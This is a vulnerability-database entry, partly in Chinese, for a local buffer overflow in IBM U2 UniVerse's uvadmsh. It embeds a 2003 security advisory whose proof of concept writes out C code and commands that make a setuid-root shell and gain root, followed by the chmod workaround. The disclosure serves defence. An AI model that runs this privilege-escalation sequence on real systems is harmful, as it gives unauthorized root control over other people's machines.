发布时间 :2003-08-18 00:00:00
修订时间 :2016-10-17 22:35:31

[原文]Buffer overflow in uvadmsh in IBM U2 UniVerse and earlier allows the uvadm user to execute arbitrary code via a long -uv.install command line argument.

[CNNVD]IBM U2 UniVerse任意代码执行漏洞(CNNVD-200308-101)

        IBM U2 UniVerse版本及之前版本的uvadmsh存在缓冲区溢出漏洞。uvadm用户可以借助超长-uv.安装命令行参数执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  VULNWATCH  20030716 SRT2003-07-08-1223 - IBM U2 UniVerse uvadm can take root via buffer overflows
(UNKNOWN)  BUGTRAQ  20030716 SRT2003-07-08-1223 - IBM U2 UniVerse uvadm can take root via buffer overflows

- 漏洞信息

IBM U2 UniVerse任意代码执行漏洞
高危 缓冲区溢出
2003-08-18 00:00:00 2005-10-20 00:00:00
        IBM U2 UniVerse版本及之前版本的uvadmsh存在缓冲区溢出漏洞。uvadm用户可以借助超长-uv.安装命令行参数执行任意代码。

- 公告与补丁


- 漏洞信息

IBM U2 UniVerse uvadmsh Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

--------------000804060106040403020807 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Thanks to IBM for being so receptive with these issues. For those of you that have requested we revive the old "Snosoft" advisories we have begun placing our legacy advisories at as time permits. -KF --------------000804060106040403020807 Content-Type: text/plain; name="SRT2003-07-07-0833.txt" Content-Transfer-Encoding: 8bit Content-Disposition: inline; filename="SRT2003-07-07-0833.txt" Secure Network Operations, Inc. Strategic Reconnaissance Team Team Lead Contact Our Mission: ************************************************************************ Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer. Quick Summary: ************************************************************************ Advisory Number : SRT2003-07-07-0833 Product : IBM U2 UniVerse Version : Version <= ? Vendor : Class : local Criticality : High (to UniVerse servers with local users) Operating System(s) : Only confirmed on Linux (other unix based?) High Level Explanation ************************************************************************ High Level Description : users with uvadm rights can take root What to do : chmod -s /usr/ibm/uv/bin/uvadmsh Technical Details ************************************************************************ Proof Of Concept Status : SNO Does have PoC code for this issue. Low Level Description : UniVerse is an extended relational database designed for embedding in vertical applications. Its nested relational data model results in intuitive data modeling and fewer resulting tables. UniVerse provides data access, storage and management capabilities across MicrosoftÂ(r) WindowsÂ(r) NT, Linux and UNIplatform. The creation and use of the Unix user 'uvadm' is optional for UniVerse. It is not required for the successfull installation, configuration and administration of UniVerse. The intended use of uvadm is to allow a selected, specific non-root user to perform all aspects of UniVerse administration. The uvadmsh program checks the users name against the string "uvadm" which means in order to exploit this issue you need to have access to the user uvadm. [kf@vegeta kf]$ ltrace /tmp/uvadmsh -uv.install /tmp ... strcmp("kf", "uvadm") = -1 [uvadm@vegeta uvadm]$ id uid=503(uvadm) gid=503(uvadm) groups=503(uvadm) You will note that with the proper uid the binary begins looking for the command line option "-uv.install" which is the path to a binary file to execute. [uvadm@vegeta uvadm]$ ltrace /tmp/uvadmsh -uv.install /tmp ... strcmp("uvadm", "uvadm") = 0 strcmp("-uv.install", "-uv.install") = 0 This condition is fairly easy to take advantage of as you can see here. [uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c main() { setuid(0); system("cc -o /tmp/owned /tmp/owned.c"); system("chmod 4755 /tmp/owned"); } [uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c [uvadm@vegeta uvadm]$ cat > /tmp/owned.c main() { setuid(0); system("/bin/bash"); } [uvadm@vegeta uvadm]$ ls -al /tmp/owned ls: /tmp/owned: No such file or directory [uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp [uvadm@vegeta uvadm]$ ls -al /tmp/owned -rwsr-xr-x 1 root uvadm 11640 Jul 2 20:15 /tmp/owned [uvadm@vegeta uvadm]$ /tmp/owned [root@vegeta uvadm]# id uid=0(root) gid=503(uvadm) groups=503(uvadm) Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvadmsh Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user to perform all of the uvadmsh functions. Vendor Status : The IBM U2 staff will have this issue resolved in a future release of IBM U2. Patches may also be supplied on a per client basis at IBM's disgression. Bugtraq URL : to be assigned ------------------------------------------------------------------------ This advisory was released by Secure Network Operations,Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact for information on how to obtain exploit information. --------------000804060106040403020807--

- 时间线

2003-07-15 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete